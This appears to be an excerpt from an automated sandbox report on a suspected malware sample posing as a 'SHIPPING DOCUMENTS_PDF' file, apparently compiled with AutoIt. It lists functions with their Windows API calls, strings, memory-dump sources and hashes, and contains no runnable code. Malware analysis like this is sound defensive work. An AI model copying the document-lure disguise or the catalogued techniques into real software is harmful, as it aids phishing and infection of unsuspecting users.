                                                                                    • Instruction Fuzzy Hash: 1931C131A003059BEB24DF58DD85BFEBBF8EF46350F1440B9E9D9A61A0D7B09940CB51
                                                                                    Function 00BC39E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __snwprintf.LIBCMT ref: 00BC3A66
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: __snwprintf_memmove
                                                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                    • API String ID: 3506404897-2584243854
                                                                                    • Opcode ID: 3ebb3cf2af42f6a41a6c25069b67f4b08c193fce4b40837868a80ee3aeb40690
                                                                                    • Instruction ID: 926ce9b5aba25c0c330b4996a621f99b9cc593c0b07114f68c574f9f1cc37ac8
                                                                                    • Opcode Fuzzy Hash: 3ebb3cf2af42f6a41a6c25069b67f4b08c193fce4b40837868a80ee3aeb40690
                                                                                    • Instruction Fuzzy Hash: ED218C71700219AACF14EF64CC82FAE77F5EF48700F4084E9F945AB281DA30EA59CB61
                                                                                    Function 00BD66D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00BD6761
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BD676C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: Combobox
                                                                                    • API String ID: 3850602802-2096851135
                                                                                    • Opcode ID: 0cde7445c740b3113027285d1cb2c28290cfefa86b43c0cc0570061d2ab66f51
                                                                                    • Instruction ID: f37654120aac28c6a340181e563cbef4a07a85dd992ffa248dba4cb516abaa8c
                                                                                    • Opcode Fuzzy Hash: 0cde7445c740b3113027285d1cb2c28290cfefa86b43c0cc0570061d2ab66f51
                                                                                    • Instruction Fuzzy Hash: 4F119071300209AFEF15CF54CC81EABB7AAEB983A8F10416AF91497391E635DC5187A0
                                                                                    Function 00BD6C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B51D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B51D73
                                                                                      • Part of subcall function 00B51D35: GetStockObject.GDI32(00000011), ref: 00B51D87
                                                                                      • Part of subcall function 00B51D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B51D91
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00BD6C71
                                                                                    • GetSysColor.USER32(00000012), ref: 00BD6C8B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                    • String ID: static
                                                                                    • API String ID: 1983116058-2160076837
                                                                                    • Opcode ID: bc81ecbc88c7368ff073d5ea03b33a5aa191c6513b6fb3a203e946ba13cb9b14
                                                                                    • Instruction ID: 466386e1cace4c381d7fc4a2fe2c88c3ad7024bc50b04fc2b8711d2447821327
                                                                                    • Opcode Fuzzy Hash: bc81ecbc88c7368ff073d5ea03b33a5aa191c6513b6fb3a203e946ba13cb9b14
                                                                                    • Instruction Fuzzy Hash: 4B211A7262020AAFDB04DFA8CC45AFABBE8FB08315F044569FD55D3250E635E850DB60
                                                                                    Function 00BD6920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00BD69A2
                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00BD69B1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                    • String ID: edit
                                                                                    • API String ID: 2978978980-2167791130
                                                                                    • Opcode ID: 2673d650f51f1f12aa7e4ed911aeff428096bf8294fceca37710ddcfd3f879e1
                                                                                    • Instruction ID: db45d9faa89389073e63347dcfaec7434a9e2891f5eaf764d512495cfe36dd8c
                                                                                    • Opcode Fuzzy Hash: 2673d650f51f1f12aa7e4ed911aeff428096bf8294fceca37710ddcfd3f879e1
                                                                                    • Instruction Fuzzy Hash: F9119D71100109ABEB108E649C60AFBB7A9EB19378F504766F9A1972E0E739DC509760
                                                                                    Function 00BB29AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00BB2A22
                                                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00BB2A41
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoItemMenu_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 2223754486-4108050209
                                                                                    • Opcode ID: e5fa24d8b16200bf6359a011e8c6e1a966022f97092022c0fc64035b1b668513
                                                                                    • Instruction ID: 7e2c00222a29e0f5276e1f26d8530223b34ac3ef30a97d4928e4d6b0e729e693
                                                                                    • Opcode Fuzzy Hash: e5fa24d8b16200bf6359a011e8c6e1a966022f97092022c0fc64035b1b668513
                                                                                    • Instruction Fuzzy Hash: D9119072901114EBDB35EB98DC44BFE77E8EB86314F1440A1E859E7290D7B0AD0ACB92
                                                                                    Function 00BC21D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00BC222C
                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00BC2255
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$OpenOption
                                                                                    • String ID: <local>
                                                                                    • API String ID: 942729171-4266983199
                                                                                    • Opcode ID: 7f81a6045521b15a2027f6f98b5a4047911bc91a814b4494825d127dc1312507
                                                                                    • Instruction ID: 7e543f8c405227b18426c216c04ec2b434db76804af2c48ad099cb98ba4e1d4e
                                                                                    • Opcode Fuzzy Hash: 7f81a6045521b15a2027f6f98b5a4047911bc91a814b4494825d127dc1312507
                                                                                    • Instruction Fuzzy Hash: AE11CE70501226BADB298F118C84FFAFBE8FB06361F10826EF9059A000E2705D80D6F0
                                                                                    Function 00BC7D8B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00BC7FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00BC7DB3,?,00000000,?,?), ref: 00BC800D
                                                                                    • inet_addr.WSOCK32(00000000), ref: 00BC7DB6
                                                                                    • htons.WSOCK32(00000000), ref: 00BC7DF3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                    • String ID: 255.255.255.255
                                                                                    • API String ID: 2496851823-2422070025
                                                                                    • Opcode ID: e6f1a2a8424deb2a2f88f5e18675c18e77746c94e230c6cb0e17d8b7ae8f790f
                                                                                    • Instruction ID: ab0e72432551a8c88d032cc9805111878e092a73b01702807bb93f6738f9e7c8
                                                                                    • Opcode Fuzzy Hash: e6f1a2a8424deb2a2f88f5e18675c18e77746c94e230c6cb0e17d8b7ae8f790f
                                                                                    • Instruction Fuzzy Hash: DA11A575548206ABCB20AF64CC86FBEB3A5FF04320F1085AAE912572D1DF71AC14DB91
                                                                                    Function 00BA8E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                      • Part of subcall function 00BAAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00BAAABC
                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00BA8E73
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 372448540-1403004172
                                                                                    • Opcode ID: bdb3b6076dfa50ed4cc06dcfc208bc55308ae193bd7ec7149c1aa7902f681f02
                                                                                    • Instruction ID: bf7f5557e49c6cace960f772e058fa56a64f5481f94ab5ad0401f0794fc61e5d
                                                                                    • Opcode Fuzzy Hash: bdb3b6076dfa50ed4cc06dcfc208bc55308ae193bd7ec7149c1aa7902f681f02
                                                                                    • Instruction Fuzzy Hash: 9B01F5B1A49219EBCB15EBA0CC919FE73E8EF06320B0046A9BC21672E1DE35580CC660
                                                                                    Function 00BB8D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: __fread_nolock_memmove
                                                                                    • String ID: EA06
                                                                                    • API String ID: 1988441806-3962188686
                                                                                    • Opcode ID: e9cbaf69a482676eb140650cebe5f6e92e69f76b1b94ddb2b78bc0fbe1f2552e
                                                                                    • Instruction ID: e023149b6c1b871992c1d28fb42625d6b2364027c00348aa7e5faa9fefdcb30a
                                                                                    • Opcode Fuzzy Hash: e9cbaf69a482676eb140650cebe5f6e92e69f76b1b94ddb2b78bc0fbe1f2552e
                                                                                    • Instruction Fuzzy Hash: C301D6718042186EDB28DAA8C856EFE7BFCDB11301F0081AFF596D2181E9B5A6088B60
                                                                                    Function 00BA8CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                      • Part of subcall function 00BAAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00BAAABC
                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00BA8D6B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 372448540-1403004172
                                                                                    • Opcode ID: 362cf36d4b3359c379e3e149c28dd68c484b3bf803941875d945cd8874b01320
                                                                                    • Instruction ID: 296a4ebf55f41b78ca4582888f35d796164f0de5b4b232a48e7111c88aa3d984
                                                                                    • Opcode Fuzzy Hash: 362cf36d4b3359c379e3e149c28dd68c484b3bf803941875d945cd8874b01320
                                                                                    • Instruction Fuzzy Hash: F001D4B1B45109ABCB15EBA0C996AFE73E8DF16300F1041B9B842672E1DE255E0CD271
                                                                                    Function 00BA8D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                      • Part of subcall function 00BAAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00BAAABC
                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00BA8DEE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 372448540-1403004172
                                                                                    • Opcode ID: c1657824a5003c8e64507cd234804ed40d91e38d2824614faa9eec8b754c9cc0
                                                                                    • Instruction ID: d000c5a8d6399b993819b24f87c94642722d2523dfab1dd73b17bb7539049d9c
                                                                                    • Opcode Fuzzy Hash: c1657824a5003c8e64507cd234804ed40d91e38d2824614faa9eec8b754c9cc0
                                                                                    • Instruction Fuzzy Hash: 6201F2B1B49109A7CB25EAA4C992AFE77E8CF16300F1041A9BC42772E2DE255E0CD271
                                                                                    Function 00BB4F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassName_wcscmp
                                                                                    • String ID: #32770
                                                                                    • API String ID: 2292705959-463685578
                                                                                    • Opcode ID: 9d5588cc54a79ba0b28fa21a96282c491df56c430ffa6975f09b84fc2333f48f
                                                                                    • Instruction ID: 628a162c51e579d7371e2d40d5c8919743a72f94ae03802b84c1a15a9c0a0d34
                                                                                    • Opcode Fuzzy Hash: 9d5588cc54a79ba0b28fa21a96282c491df56c430ffa6975f09b84fc2333f48f
                                                                                    • Instruction Fuzzy Hash: DCE09232A042292BE7209A99AC4ABF7FBECEB55B60F004067FD44D3051EA709A45C7E0
                                                                                    Function 00B8B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B8B314: _memset.LIBCMT ref: 00B8B321
                                                                                      • Part of subcall function 00B70940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00B8B2F0,?,?,?,00B5100A), ref: 00B70945
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00B5100A), ref: 00B8B2F4
                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00B5100A), ref: 00B8B303
                                                                                    Strings
                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B8B2FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                    • API String ID: 3158253471-631824599
                                                                                    • Opcode ID: 3f75a0ec547363a3bd2b709e4d4155d8461b2403fe3b2b2d549ceb32d9e7a6f5
                                                                                    • Instruction ID: 102c37c2372bfff6491d8dc6aabe280b960b9cb8df58230c8d3c8ba750d8b383
                                                                                    • Opcode Fuzzy Hash: 3f75a0ec547363a3bd2b709e4d4155d8461b2403fe3b2b2d549ceb32d9e7a6f5
                                                                                    • Instruction Fuzzy Hash: C4E06D71600702CBD720AF38E814756BBE4BF04314F0489ADF856C76A1EBB4D408CBA1
                                                                                    Function 00BA7C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00BA7C82
                                                                                      • Part of subcall function 00B73358: _doexit.LIBCMT ref: 00B73362
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message_doexit
                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                    • API String ID: 1993061046-4017498283
                                                                                    • Opcode ID: 832034c0a440a33caa285596e360b2fd012b6f84c8db7464ea27d257cfd5a3c6
                                                                                    • Instruction ID: e2b1776cf7827994ee72e9713b195bde65a1c7ac84885fbfd9161e37b702ac0a
                                                                                    • Opcode Fuzzy Hash: 832034c0a440a33caa285596e360b2fd012b6f84c8db7464ea27d257cfd5a3c6
                                                                                    • Instruction Fuzzy Hash: CED012323C935836D11532A96C06BDA66C88B05B56F1444A6FB18995D34ED1958091A9
                                                                                    Function 00B91935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 00B91775
                                                                                      • Part of subcall function 00BCBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00B9195E,?), ref: 00BCBFFE
                                                                                      • Part of subcall function 00BCBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00BCC010
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00B9196D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                    • String ID: WIN_XPe
                                                                                    • API String ID: 582185067-3257408948
                                                                                    • Opcode ID: 900aa5e76ae8ddf3c619df22ed70853d394802e493ba22653af3dd559766a96b
                                                                                    • Instruction ID: 3cd40d19ead060c6bbd18cc40185eb09339770a56686d1aeb62c1d5b8c0557f1
                                                                                    • Opcode Fuzzy Hash: 900aa5e76ae8ddf3c619df22ed70853d394802e493ba22653af3dd559766a96b
                                                                                    • Instruction Fuzzy Hash: 04F0A5B080510ADFDB15DB95C9D4BECBBF8AB08301F5404EAE102A31A0DB758F84EF60
